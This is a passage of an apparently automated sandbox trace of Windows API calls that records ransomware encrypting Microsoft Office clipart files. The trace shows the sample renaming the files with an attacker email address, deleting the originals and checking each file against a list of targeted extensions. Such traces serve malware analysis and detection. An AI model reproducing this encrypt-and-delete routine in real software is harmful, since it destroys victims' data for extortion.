| out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0x0, lpOverlapped=0x0) returned 1 [0294.884] WriteFile (in: hFile=0x470, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0xec, lpOverlapped=0x0) returned 1 [0294.884] SetEndOfFile (hFile=0x470) returned 1 [0294.884] CloseHandle (hObject=0x470) returned 1 [0294.892] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0294.892] SetEndOfFile (hFile=0x46c) returned 1 [0294.896] CloseHandle (hObject=0x46c) returned 1 [0294.897] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04267_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0294.897] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04267_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04267_.wmf")) returned 1 [0295.061] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 68 [0295.061] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 68 [0295.061] lstrlenW (lpString=".doc") returned 4 [0295.061] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0295.061] lstrlenW (lpString=".docx") returned 5 [0295.061] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0295.061] lstrlenW (lpString=".pdf") returned 4 [0295.061] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0295.061] lstrlenW (lpString=".xls") returned 4 [0295.061] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0295.061] lstrlenW (lpString=".xlsx") returned 5 [0295.061] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0295.061] lstrlenW (lpString=".ppt") returned 4 [0295.062] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0295.062] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 68 [0295.062] lstrlenW (lpString=".zip") returned 4 [0295.062] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0295.062] lstrlenW (lpString=".rar") returned 4 [0295.062] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0295.062] lstrlenW (lpString=".bz2") returned 4 [0295.062] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0295.062] lstrlenW (lpString=".7z") returned 3 [0295.062] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0295.062] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 68 [0295.062] lstrlenW (lpString=".dbf") returned 4 [0295.062] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0295.062] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 68 [0295.062] lstrlenW (lpString=".1cd") returned 4 [0295.062] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0295.062] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 68 [0295.062] lstrlenW (lpString=".jpg") returned 4 [0295.062] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0295.062] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 68 [0295.062] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 68 [0295.062] lstrlenW (lpString=".doc") returned 4 [0295.062] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0295.062] lstrlenW (lpString=".docx") returned 5 [0295.062] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0295.062] lstrlenW (lpString=".pdf") returned 4 [0295.062] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0295.062] lstrlenW (lpString=".xls") returned 4 [0295.062] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0295.062] lstrlenW (lpString=".xlsx") returned 5 [0295.062] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0295.063] lstrlenW (lpString=".ppt") returned 4 [0295.063] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0295.063] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 68 [0295.063] lstrlenW (lpString=".zip") returned 4 [0295.063] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0295.063] lstrlenW (lpString=".rar") returned 4 [0295.063] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0295.063] lstrlenW (lpString=".bz2") returned 4 [0295.063] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0295.063] lstrlenW (lpString=".7z") returned 3 [0295.063] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0295.063] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 68 [0295.063] lstrlenW (lpString=".dbf") returned 4 [0295.063] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0295.063] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 68 [0295.063] lstrlenW (lpString=".1cd") returned 4 [0295.063] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0295.063] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 68 [0295.063] lstrlenW (lpString=".jpg") returned 4 [0295.063] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0295.063] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0295.063] lstrlenW (lpString="AN04332_.WMF") returned 12 [0295.063] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04332_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04332_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c4 [0295.473] GetFileSizeEx (in: hFile=0x4c4, lpFileSize=0x298ff14 | out: lpFileSize=0x298ff14*=4296) returned 1 [0295.473] CloseHandle (hObject=0x4c4) returned 1 [0295.473] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04332_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04332_.wmf")) returned 0x220 [0295.474] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04332_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04332_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0295.474] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04332_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04332_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c4 [0295.474] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0295.474] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0295.474] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04332_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04332_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0295.475] GetLastError () returned 0x0 [0295.475] ReadFile (in: hFile=0x4c4, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0x10c8, lpOverlapped=0x0) returned 1 [0295.478] WriteFile (in: hFile=0x4c8, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0x10d0, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0x10d0, lpOverlapped=0x0) returned 1 [0295.481] ReadFile (in: hFile=0x4c4, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0x0, lpOverlapped=0x0) returned 1 [0295.481] WriteFile (in: hFile=0x4c8, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0xec, lpOverlapped=0x0) returned 1 [0295.481] SetEndOfFile (hFile=0x4c8) returned 1 [0295.482] CloseHandle (hObject=0x4c8) returned 1 [0295.483] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0295.483] SetEndOfFile (hFile=0x4c4) returned 1 [0295.486] CloseHandle (hObject=0x4c4) returned 1 [0295.486] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04332_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0295.487] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04332_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04332_.wmf")) returned 1 [0295.488] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04332_.WMF") returned 68 [0295.488] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04332_.WMF") returned 68 [0295.488] lstrlenW (lpString=".doc") returned 4 [0295.488] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0295.488] lstrlenW (lpString=".docx") returned 5 [0295.488] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0295.488] lstrlenW (lpString=".pdf") returned 4 [0295.488] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0295.488] lstrlenW (lpString=".xls") returned 4 [0295.488] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0295.488] lstrlenW (lpString=".xlsx") returned 5 [0295.488] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0295.488] lstrlenW (lpString=".ppt") returned 4 [0295.488] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0295.488] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04332_.WMF") returned 68 [0295.488] lstrlenW (lpString=".zip") returned 4 [0295.488] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0295.488] lstrlenW (lpString=".rar") returned 4 [0295.488] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0295.488] lstrlenW (lpString=".bz2") returned 4 [0295.488] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0295.488] lstrlenW (lpString=".7z") returned 3 [0295.489] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0295.489] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04332_.WMF") returned 68 [0295.489] lstrlenW (lpString=".dbf") returned 4 [0295.489] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0295.489] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04332_.WMF") returned 68 [0295.489] lstrlenW (lpString=".1cd") returned 4 [0295.489] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0295.489] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04332_.WMF") returned 68 [0295.489] lstrlenW (lpString=".jpg") returned 4 [0295.489] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0295.489] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04332_.WMF") returned 68 [0295.489] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04332_.WMF") returned 68 [0295.489] lstrlenW (lpString=".doc") returned 4 [0295.489] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0295.489] lstrlenW (lpString=".docx") returned 5 [0295.489] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0295.489] lstrlenW (lpString=".pdf") returned 4 [0295.489] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0295.489] lstrlenW (lpString=".xls") returned 4 [0295.490] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0295.490] lstrlenW (lpString=".xlsx") returned 5 [0295.490] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0295.490] lstrlenW (lpString=".ppt") returned 4 [0295.490] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0295.490] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04332_.WMF") returned 68 [0295.490] lstrlenW (lpString=".zip") returned 4 [0295.490] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0295.490] lstrlenW (lpString=".rar") returned 4 [0295.490] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0295.490] lstrlenW (lpString=".bz2") returned 4 [0295.490] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0295.490] lstrlenW (lpString=".7z") returned 3 [0295.490] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0295.490] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04332_.WMF") returned 68 [0295.490] lstrlenW (lpString=".dbf") returned 4 [0295.490] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0295.490] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04332_.WMF") returned 68 [0295.490] lstrlenW (lpString=".1cd") returned 4 [0295.490] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0295.490] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04332_.WMF") returned 68 [0295.491] lstrlenW (lpString=".jpg") returned 4 [0295.491] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0295.491] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0295.491] lstrlenW (lpString="BD00116_.WMF") returned 12 [0295.491] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00116_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00116_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c4 [0295.493] GetFileSizeEx (in: hFile=0x4c4, lpFileSize=0x298ff14 | out: lpFileSize=0x298ff14*=4870) returned 1 [0295.493] CloseHandle (hObject=0x4c4) returned 1 [0295.494] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00116_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00116_.wmf")) returned 0x220 [0295.494] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00116_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00116_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0295.494] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00116_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00116_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c4 [0295.494] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0295.494] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0295.495] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00116_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00116_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0295.495] GetLastError () returned 0x0 [0295.495] ReadFile (in: hFile=0x4c4, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0x1306, lpOverlapped=0x0) returned 1 [0295.498] WriteFile (in: hFile=0x4c8, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0x1310, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0x1310, lpOverlapped=0x0) returned 1 [0295.499] ReadFile (in: hFile=0x4c4, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0x0, lpOverlapped=0x0) returned 1 [0295.499] WriteFile (in: hFile=0x4c8, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0xec, lpOverlapped=0x0) returned 1 [0295.499] SetEndOfFile (hFile=0x4c8) returned 1 [0295.500] CloseHandle (hObject=0x4c8) returned 1 [0295.504] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0295.504] SetEndOfFile (hFile=0x4c4) returned 1 [0295.946] CloseHandle (hObject=0x4c4) returned 1 [0295.947] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00116_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0295.948] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00116_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00116_.wmf")) returned 1 [0295.948] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00116_.WMF") returned 68 [0295.948] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00116_.WMF") returned 68 [0295.948] lstrlenW (lpString=".doc") returned 4 [0295.948] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0295.949] lstrlenW (lpString=".docx") returned 5 [0295.949] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0295.949] lstrlenW (lpString=".pdf") returned 4 [0295.949] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0295.949] lstrlenW (lpString=".xls") returned 4 [0295.949] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0295.949] lstrlenW (lpString=".xlsx") returned 5 [0295.949] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0295.949] lstrlenW (lpString=".ppt") returned 4 [0295.949] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0295.949] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00116_.WMF") returned 68 [0295.949] lstrlenW (lpString=".zip") returned 4 [0295.949] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0295.949] lstrlenW (lpString=".rar") returned 4 [0295.949] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0295.949] lstrlenW (lpString=".bz2") returned 4 [0295.949] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0295.949] lstrlenW (lpString=".7z") returned 3 [0295.949] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0295.949] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00116_.WMF") returned 68 [0295.949] lstrlenW (lpString=".dbf") returned 4 [0295.949] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0295.949] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00116_.WMF") returned 68 [0295.949] lstrlenW (lpString=".1cd") returned 4 [0295.949] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0295.949] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00116_.WMF") returned 68 [0295.950] lstrlenW (lpString=".jpg") returned 4 [0295.950] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0295.950] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00116_.WMF") returned 68 [0295.950] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00116_.WMF") returned 68 [0295.950] lstrlenW (lpString=".doc") returned 4 [0295.950] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0295.950] lstrlenW (lpString=".docx") returned 5 [0295.950] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0295.950] lstrlenW (lpString=".pdf") returned 4 [0295.950] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0295.950] lstrlenW (lpString=".xls") returned 4 [0295.950] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0295.950] lstrlenW (lpString=".xlsx") returned 5 [0295.950] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0295.950] lstrlenW (lpString=".ppt") returned 4 [0295.950] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0295.950] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00116_.WMF") returned 68 [0295.950] lstrlenW (lpString=".zip") returned 4 [0295.950] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0295.950] lstrlenW (lpString=".rar") returned 4 [0295.950] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0295.950] lstrlenW (lpString=".bz2") returned 4 [0295.950] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0295.950] lstrlenW (lpString=".7z") returned 3 [0295.951] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0295.951] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00116_.WMF") returned 68 [0295.951] lstrlenW (lpString=".dbf") returned 4 [0295.951] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0295.951] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00116_.WMF") returned 68 [0295.951] lstrlenW (lpString=".1cd") returned 4 [0295.951] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0295.951] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00116_.WMF") returned 68 [0295.951] lstrlenW (lpString=".jpg") returned 4 [0295.951] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0295.951] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0295.951] lstrlenW (lpString="BD06102_.WMF") returned 12 [0295.951] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06102_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd06102_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0 [0295.971] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0x298ff14 | out: lpFileSize=0x298ff14*=16112) returned 1 [0295.971] CloseHandle (hObject=0x3d0) returned 1 [0295.971] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06102_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd06102_.wmf")) returned 0x220 [0295.973] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06102_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd06102_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0295.973] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06102_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd06102_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0 [0295.973] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0295.974] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0295.974] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06102_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd06102_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0295.974] GetLastError () returned 0x0 [0295.974] ReadFile (in: hFile=0x3d0, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0x3ef0, lpOverlapped=0x0) returned 1 [0295.977] WriteFile (in: hFile=0x44c, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0x3f00, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0x3f00, lpOverlapped=0x0) returned 1 [0295.978] ReadFile (in: hFile=0x3d0, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0x0, lpOverlapped=0x0) returned 1 [0295.978] WriteFile (in: hFile=0x44c, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0xec, lpOverlapped=0x0) returned 1 